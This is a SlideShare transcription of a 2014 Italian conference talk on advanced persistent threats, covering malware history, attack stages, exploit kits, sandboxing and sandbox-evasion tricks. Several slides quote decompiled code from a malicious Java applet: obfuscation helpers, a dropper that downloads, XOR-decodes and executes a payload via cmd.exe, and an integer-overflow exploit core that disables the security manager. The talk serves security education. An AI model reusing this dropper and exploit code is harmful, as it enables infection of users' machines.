The magic world of APT 0.6 - Pompili

3,247 views

Published on

Slides from Simone Pompili talk @Codemotion Roma 2014

Published in: Technology, Business
  • Be the first to comment

  • Be the first to like this

The magic world of APT 0.6 - Pompili

  1. 1. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com THE MAGIC WORLD OF ADVANCED PERSISTENT THREATS Andrea Pompili There are only 10 types of people in the world: Those who understand binary, and those who don't apompili@hotmail.com
  2. 2. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Attacker Zovi) http://trailofbits.files.wordpress.com/2011/08/attacker-math.pdf
  3. 3. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Come si sviluppa un attacco? <#1> <#2> <#3>
  4. 4. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <1996> The Dark Side of the Moon http://vx.org.ua/29a/main.html
  5. 5. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com rem barok -loveletter(vbe) <i hate go to school> rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines <2000> 8,7 miliardi di dollari
  6. 6. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <2001> The Nimda Style Microsoft IIS e PWS Extended Unicode Directory transversalVulnerability Microsoft IIS/PWS Escaped Characters Decoding Command Execution Vulnerability Microsoft IE MIME Header Attachment Execution VulnerabilityTFTP Server UDP:69 RICHED20.DLL Microsoft Office 2000 DLL Execution Vulnerability Microsoft IE MIME Header Attachment Execution Vulnerability 635 milioni di dollari
  7. 7. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com SQL Server 2000 Desktop Engine 75.000 computer infettati in soli 10 minuti payload di soli 376 byte (residente esclusivamente in memoria) 1,2 miliardi di dollari
  8. 8. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com 22,6 miliardi di dollari DDOS contro www.sco.com Upload&Execute0x85 0x13 0x3c 0x9e 0xa2 Backdoor TCP 3127-3198 http://echohacker.altervista.org/articoli/mydoom.html
  9. 9. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <2010-2012> Government in Action > Stuxnet (2010) > Duqu (2011) > Flame (2012) > Gauss (2012) http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping- for-zero-days-an-price-list-for-hackers-secret-software-exploits/ ShoppingFor Zero-Days
  10. 10. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Il Malware più complesso della storia > 20MB di dimensione (900Kb programma principale/dropper + 16 moduli ad oggi rilevati) > 80 domini utilizzati come sistemi di Comando e Controllo > Diffusione via USB Stick (Infectmedia) > Enumerazione dei dispositivi Bluetooth (Beetlejuice) > Registrazione audio (Microbe) > Windows Update MITM (Munch & Gadget) MD5 Collision Attack
  11. 11. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <2007> Storm Worm & CyberCrime Market http://www.pcworld.com/article/138694/article.html
  12. 12. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com http://www.infosecblog.org/2013/01/you-are-the-target/hackedpc2012/ « »
  13. 13. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Advanced Persistent Threats 101 > Trust Exploitation Social Engineering Spear Phishing Botnet Drive-to-Click Strategy
  14. 14. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com > Trust Exploitation > Client Exploitation Exploit Pack (e.g.Neutrino) 0-Day Advanced Persistent Threats 101
  15. 15. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com > Trust Exploitation > Client Exploitation > Multi-Stage Shellcoding Dropper/Downloader Modules(e.g.RAT, Infostealer,etc.) Good Covert Channel Advanced Persistent Threats 101
  16. 16. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com > Trust Exploitation > Client Exploitation > Multi-Stage > Multi-Vector Email WebSites Botnet Physical (USB) Advanced Persistent Threats 101
  17. 17. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com > Trust Exploitation > Client Exploitation > Multi-Stage > Multi-Vector > Resiliency Camouflaging Command &Control Good Covert Channel Advanced Persistent Threats 101
  18. 18. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Make or Buy?
  19. 19. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Botnet Choice
  20. 20. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Drive-to-Click <#1>
  21. 21. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Drive-to-Click <#2>
  22. 22. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Drive-to-Click <#3>
  23. 23. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Drive-to-Click <#4>
  24. 24. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Drive-to-Click <#5>
  25. 25. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Trick#1> Giochiamo con le estensioni RLO Unicode control character
  26. 26. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Trick#2> Content-Disposition Nightmare http://www.gnucitizen.org/blog/content-disposition-hacking/ Download Server Response Headers RFC 2616
  27. 27. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <applet codebase=“http://blahblah.evilsite.in/hiddenpath/" archive=“http://blahblah.othersite.in/hiddenpath/ c8c34734f41cca863a972129369060d9” code=“rgmiv”> Trick#3> Client Exploiting
  28. 28. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com public class xp extends JApplet { public void init() { try { Object aobj[] = new Object[0]; Object obj = gsdfvg.ccla(tcbteokd.fuss(tcbteokd.p), 1); String s = "hpjwbludyi"; s = "wgpxrwyvzolbb"; s = "zdfmvftloqmakqysyu"; s = "nrrkqnjfylgtljyyferr"; cr.hzumfnc(obj); Object aobj1[] = new Object[0]; String s1 = "ofvszonrzgelnko"; s1 = "fefhtspcqhj"; s1 = "evztavmzjarjgwu"; Object obj1 = ygigtele.bjixqh(tcbteokd.fuss(tcbteokd.nq), new Class[] { Integer.TYPE }).newInstance(new Object[] { Integer.valueOf(tcbteokd.mdrikbua(9)) }); int ai[] = new int[8]; Object aobj2[] = new Object[7]; aobj2[2] = cr.hzumfnc(obj); ...
  29. 29. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <01> XOR String Encryption public static String ok = ha.n("1:-:u:,/u26:<>ub:6+7>0264?>7"); ... public static String n(String s) { String s1 = ""; for (int i = 0; i < s.length(); i++) s1 += idzfihff(s.charAt(i)); return s1; } ... public static char idzfihff(char c) { return (char)(c ^ 0x5b); } https://media.blackhat.com/bh-us-12/Briefings/Oh/ BH_US_12_Oh_Recent_Java_Exploitation_Trends_and_Malware_WP.pdf Malware
  30. 30. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <02> Java Reflection public static Class fuss(String s) throws Exception { return Class.forName(s); } ... public static Object dngfuv(Method method, Object obj, Object aobj[]) { return method.invoke(obj, aobj); } public static Constructor bjixqh(Class class1, Class aclass[]) { return class1.getConstructor(aclass); } ... https://media.blackhat.com/bh-us-12/Briefings/Oh/ BH_US_12_Oh_Recent_Java_Exploitation_Trends_and_Malware_WP.pdf Malware
  31. 31. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <03> ClassLoader Override class t extends ClassLoader { public static void ujrzjw(t t1, String s) { try { Class class1 = t1.defineClass("qbw", tcbteokd.xcpoalaefqfvuacylvakyi, 0, tcbteokd.xcpoalaefqfvuacylvakyi.length); ygigtele.bjixqh(class1, new Class[] { tcbteokd.fuss("java.lang.String") }).newInstance(new Object[] { s }); } catch (Exception ex) { System.exit(0); } } } Malware
  32. 32. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com ... private static void lcsqyrgtbct (String s, int i) { String s1 = s + Integer.valueOf(i); ... rchannel= Channels.newChannel((new URL(s1)).openStream()); ... File file = File.createTempFile("~tmf", null); FileOutputStream fos= new FileOutputStream(file); for (int j = 0; j < abyte0.length; j++) abyte0[j] = (byte)(abyte0[j] ^ 0x29); fos.write(abyte0); if (abyte0.length > 1024) try { Runtime.getRuntime().exec(new String[] { "cmd.exe", "/C", file.getAbsolutePath() }); } catch (IOException ioe) { (new ProcessBuilder(new String[] { file.getAbsolutePath() })).start(); } The Dropper Class
  33. 33. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Object obj1 = new java.awt.image.DataBufferByte(9); int[] ai = new int[8]; Object[] oo = new Object[7]; oo[2] = new java.beans.Statement(System.class, "setSecurityManager", new Object[1]); ... DataBufferByte obj5 = new DataBufferByte(8); for (int j = 0; j < 8; j++) obj5.setElem(j, -1); MultiPixelPackedSampleModel obj6 = new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE,4,1,1,4,0); Raster obj7 = Raster.createWritableRaster(obj6, obj5, null); MultiPixelPackedSampleModel obj8 = new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE,4,2,1, 0x3fffffdd - (tcbteokd.pi ? 16 : 0), 288 + (tcbteokd.pi ? 128 : 0)); Raster obj9 = Raster.createWritableRaster(obj8, obj1, null); byte obj10 = new byte[] {0, -1} IndexColorModel obj11 = new IndexColorModel(1, 2, obj10, obj10, obj10); CompositeContext obj12 = AlphaComposite.Src.createContext(obj11, obj11, null); obj12.compose(obj7, obj9, obj9); The Malware Core http://valhalla.allalla.com/2013/08/ java-netbeans-applet-integer-overflow-win32-target-added/
  34. 34. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Cheaper Path to Exploiting Blackole Exploit Kit http://en.wikipedia.org/wiki/Blackhole_exploit_kit Styx Exploit Pack http://krebsonsecurity.com/2013/07/styx-exploit-pack-domo-arigato-pc-roboto Neutrino http://malware.dontneedcoffee.com/2013/03/hello-neutrino-just-one-more- exploit-kit.html RedKit http://blog.spiderlabs.com/2012/05/a-wild-exploit-kit-appears.html
  35. 35. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The InfoStealer Choice
  36. 36. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The RAT Choice
  37. 37. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Bitcoin + APT = Ransomware
  38. 38. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Command&Control Choice <#1>
  39. 39. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Command&Control Choice <#2>
  40. 40. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Command&Control Choice <#3>
  41. 41. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Command&Control Choice <#4>
  42. 42. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com “The truth is, consumer-grade antivirus products can’t protect against targeted malware created by well- resourced nation-states with bulging budgets. They can protect you against run-of-the-mill malware: banking trojans, keystroke loggers and e-mail worms. But targeted attacks like these go to great lengths to avoid antivirus products on purpose” MikkoHypponen(F-Secure) <2012> The Antivirus Maker Confession
  43. 43. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Way to Sandboxing
  44. 44. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <01> USER-MODE AGENT Softwarecomponent inaguest operating system (keylogger) <02> KERNEL-MODE PATCHING Guestoperating system Kernelmodified fortracing (rootkit) <03> VIRTUAL MACHINE MONITORING Customized Hypervisor to monitor the guest operatingsystem <04> SYSTEM EMULATION Hardwareemulator to hookappropriate memory, IO functions,peripherals, etc. <05> KERNEL EMULATION Kernelemulator tohookappropriate system calls, etc. The Way to Sandboxing
  45. 45. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Una lista (molto) parziale dei Player > Norman Sandbox (Norway2001) > FireEye (US2004) > Damballa (US2006) > Lastline/Anubis/Wepawet (Austria 2006) > Sandboxie (2006) > Cuckoo Sandbox (2010) > VMRay formerly CWSandbox (Germany 2007) > Joe Security LLC (Switzerland 2007) > BitBlaze (2008) > ThreatExpert (Ireland 2008) > Ether (US 2009)
  46. 46. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com
  47. 47. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Una lista (completamente) parziale degli Evader
  48. 48. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Evading Sandbox 4 Dummies > Human Interaction (UpClicker, December 2012) > MessageBox (Something thatneed to be clicked) > Sleep Calls (Trojan Nap, uncoveredin February2013) > Time Triggers (Hastati, March 2013 a massive, data-destroying attack in South Korea) > Check Internet Connection > Check Volume information and Size > Check self Executable name > Execution after reboot > Check System services, files and communication ports
  49. 49. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Il limite delle Sandbox Minuti def: il Paziente Zero è il primo paziente individuato nel campione della popolazione di un'indagine epidemiologica…
  50. 50. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Sicuramente meglio che confidare negli utenti
  51. 51. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Domande? Italian ‫ة‬َّ‫ي‬َ‫أ‬ ‫ِب‬‫ل‬‫ا‬َ‫ط‬َ‫م‬ Arabic ¿Preguntas? Spanish Questions? English tupoQghachmey Klingon Sindarin Japanese Ερωτήσεις? Greek вопросы? Russian

×